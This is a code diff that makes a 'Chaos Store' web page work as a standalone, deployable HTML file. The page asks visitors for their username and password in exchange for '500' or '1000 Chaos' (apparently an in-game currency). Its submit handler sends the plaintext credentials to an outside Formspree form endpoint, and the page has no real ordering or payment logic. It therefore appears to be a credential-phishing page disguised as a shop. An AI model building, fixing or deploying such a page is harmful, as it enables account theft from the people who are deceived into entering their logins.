--- a/index.html
+++ b/index.html
@@ -13,141 +13,148 @@
     <div id="root"></div>
     <script type="text/babel">
         const { useState } = React;
-      import React, { useState } from 'react';
-import { Send } from 'lucide-react';
 
-export default function ChaosOrderForm() {
-  const [formData, setFormData] = useState({
-    username: '',
-    password: '',
-    chaosAmount: '500'
-  });
-  const [status, setStatus] = useState('');
-  const [loading, setLoading] = useState(false);
+        // Lucide Send icon component
+        const Send = ({ size = 24 }) => (
+          <svg width={size} height={size} viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round">
+            <line x1="22" y1="2" x2="11" y2="13"></line>
+            <polygon points="22 2 15 22 11 13 2 9 22 2"></polygon>
+          </svg>
+        );
 
-  const handleSubmit = async () => {
-    if (!formData.username || !formData.password) {
-      setStatus('Please fill in all fields');
-      return;
-    }
+        function ChaosOrderForm() {
+          const [formData, setFormData] = useState({
+            username: '',
+            password: '',
+            chaosAmount: '500'
+          });
+          const [status, setStatus] = useState('');
+          const [loading, setLoading] = useState(false);
 
-    setLoading(true);
-    setStatus('');
+          const handleSubmit = async () => {
+            if (!formData.username || !formData.password) {
+              setStatus('Please fill in all fields');
+              return;
+            }
 
-    try {
-      const response = await fetch('https://formspree.io/f/xvgdnakd', {
-        method: 'POST',
-        headers: {
-          'Content-Type': 'application/json',
-        },
-        body: JSON.stringify({
-          subject: `New Chaos Order - ${formData.chaosAmount}`,
-          username: formData.username,
-          password: formData.password,
-          chaosAmount: formData.chaosAmount,
-          timestamp: new Date().toLocaleString()
-        }),
-      });
+            setLoading(true);
+            setStatus('');
 
-      if (response.ok) {
-        setStatus('Order submitted successfully! ✓');
-        setFormData({ username: '', password: '', chaosAmount: '500' });
-      } else {
-        setStatus('Failed to submit. Please try again.');
-      }
-    } catch (error) {
-      setStatus('Error submitting form. Please try again.');
-    } finally {
-      setLoading(false);
-    }
-  };
+            try {
+              const response = await fetch('https://formspree.io/f/xvgdnakd', {
+                method: 'POST',
+                headers: {
+                  'Content-Type': 'application/json',
+                },
+                body: JSON.stringify({
+                  subject: `New Chaos Order - ${formData.chaosAmount}`,
+                  username: formData.username,
+                  password: formData.password,
+                  chaosAmount: formData.chaosAmount,
+                  timestamp: new Date().toLocaleString()
+                }),
+              });
 
-  return (
-    <div className="min-h-screen bg-gradient-to-br from-purple-100 via-pink-50 to-blue-100 flex items-center justify-center p-4">
-      <div className="w-full max-w-md">
-        <div className="bg-white rounded-lg shadow-xl overflow-hidden">
-          <div className="bg-gradient-to-r from-purple-600 via-pink-500 to-orange-400 p-6 text-center">
-            <h1 className="text-3xl font-bold text-white mb-2">Chaos Store</h1>
-            <p className="text-white text-opacity-90">Get your chaos delivered</p>
-          </div>
+              if (response.ok) {
+                setStatus('Order submitted successfully! ✓');
+                setFormData({ username: '', password: '', chaosAmount: '500' });
+              } else {
+                setStatus('Failed to submit. Please try again.');
+              }
+            } catch (error) {
+              setStatus('Error submitting form. Please try again.');
+            } finally {
+              setLoading(false);
+            }
+          };
 
-          <div className="p-8 space-y-6">
-            <div>
-              <label className="block text-sm font-medium text-gray-700 mb-2">
-                Username
-              </label>
-              <input
-                type="text"
-                value={formData.username}
-                onChange={(e) => setFormData({...formData, username: e.target.value})}
-                className="w-full px-4 py-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-purple-500 focus:border-transparent transition"
-                placeholder="Enter your username"
-              />
-            </div>
+          return (
+            <div className="min-h-screen bg-gradient-to-br from-purple-100 via-pink-50 to-blue-100 flex items-center justify-center p-4">
+              <div className="w-full max-w-md">
+                <div className="bg-white rounded-lg shadow-xl overflow-hidden">
+                  <div className="bg-gradient-to-r from-purple-600 via-pink-500 to-orange-400 p-6 text-center">
+                    <h1 className="text-3xl font-bold text-white mb-2">Chaos Store</h1>
+                    <p className="text-white text-opacity-90">Get your chaos delivered</p>
+                  </div>
 
-            <div>
-              <label className="block text-sm font-medium text-gray-700 mb-2">
-                Password
-              </label>
-              <input
-                type="password"
-                value={formData.password}
-                onChange={(e) => setFormData({...formData, password: e.target.value})}
-                className="w-full px-4 py-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-purple-500 focus:border-transparent transition"
-                placeholder="Enter your password"
-              />
-            </div>
+                  <div className="p-8 space-y-6">
+                    <div>
+                      <label className="block text-sm font-medium text-gray-700 mb-2">
+                        Username
+                      </label>
+                      <input
+                        type="text"
+                        value={formData.username}
+                        onChange={(e) => setFormData({...formData, username: e.target.value})}
+                        className="w-full px-4 py-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-purple-500 focus:border-transparent transition"
+                        placeholder="Enter your username"
+                      />
+                    </div>
 
-            <div>
-              <label className="block text-sm font-medium text-gray-700 mb-2">
-                How many chaos do you need?
-              </label>
-              <select
-                value={formData.chaosAmount}
-                onChange={(e) => setFormData({...formData, chaosAmount: e.target.value})}
-                className="w-full px-4 py-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-purple-500 focus:border-transparent transition bg-white"
-              >
-                <option value="500">500 Chaos</option>
-                <option value="1000">1000 Chaos</option>
-              </select>
-            </div>
+                    <div>
+                      <label className="block text-sm font-medium text-gray-700 mb-2">
+                        Password
+                      </label>
+                      <input
+                        type="password"
+                        value={formData.password}
+                        onChange={(e) => setFormData({...formData, password: e.target.value})}
+                        className="w-full px-4 py-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-purple-500 focus:border-transparent transition"
+                        placeholder="Enter your password"
+                      />
+                    </div>
 
-            <button
-              onClick={handleSubmit}
-              disabled={loading}
-              className="w-full bg-gradient-to-r from-purple-600 to-pink-500 text-white py-3 rounded-lg font-semibold hover:from-purple-700 hover:to-pink-600 transition-all transform hover:scale-105 disabled:opacity-50 disabled:cursor-not-allowed flex items-center justify-center gap-2"
-            >
-              {loading ? (
-                'Submitting...'
-              ) : (
-                <>
-                  <Send size={20} />
-                  Submit Order
-                </>
-              )}
-            </button>
+                    <div>
+                      <label className="block text-sm font-medium text-gray-700 mb-2">
+                        How many chaos do you need?
+                      </label>
+                      <select
+                        value={formData.chaosAmount}
+                        onChange={(e) => setFormData({...formData, chaosAmount: e.target.value})}
+                        className="w-full px-4 py-3 border border-gray-300 rounded-lg focus:ring-2 focus:ring-purple-500 focus:border-transparent transition bg-white"
+                      >
+                        <option value="500">500 Chaos</option>
+                        <option value="1000">1000 Chaos</option>
+                      </select>
+                    </div>
 
-            {status && (
-              <div className={`text-center p-3 rounded-lg ${
-                status.includes('success') 
-                  ? 'bg-green-100 text-green-700' 
-                  : 'bg-red-100 text-red-700'
-              }`}>
-                {status}
+                    <button
+                      onClick={handleSubmit}
+                      disabled={loading}
+                      className="w-full bg-gradient-to-r from-purple-600 to-pink-500 text-white py-3 rounded-lg font-semibold hover:from-purple-700 hover:to-pink-600 transition-all transform hover:scale-105 disabled:opacity-50 disabled:cursor-not-allowed flex items-center justify-center gap-2"
+                    >
+                      {loading ? (
+                        'Submitting...'
+                      ) : (
+                        <>
+                          <Send size={20} />
+                          Submit Order
+                        </>
+                      )}
+                    </button>
+
+                    {status && (
+                      <div className={`text-center p-3 rounded-lg ${
+                        status.includes('success') 
+                          ? 'bg-green-100 text-green-700' 
+                          : 'bg-red-100 text-red-700'
+                      }`}>
+                        {status}
+                      </div>
+                    )}
+                  </div>
+
+                  <div className="bg-gray-50 px-8 py-4 text-center text-sm text-gray-500">
+                    <p>Secure checkout • Instant delivery</p>
+                  </div>
+                </div>
               </div>
-            )}
-          </div>
+            </div>
+          );
+        }
 
-          <div className="bg-gray-50 px-8 py-4 text-center text-sm text-gray-500">
-            <p>Secure checkout • Instant delivery</p>
-          </div>
-        </div>
-      </div>
-    </div>
-  );
-}
-        
-        
+        const root = ReactDOM.createRoot(document.getElementById('root'));
+        root.render(<ChaosOrderForm />);
     </script>
 </body>
 </html>
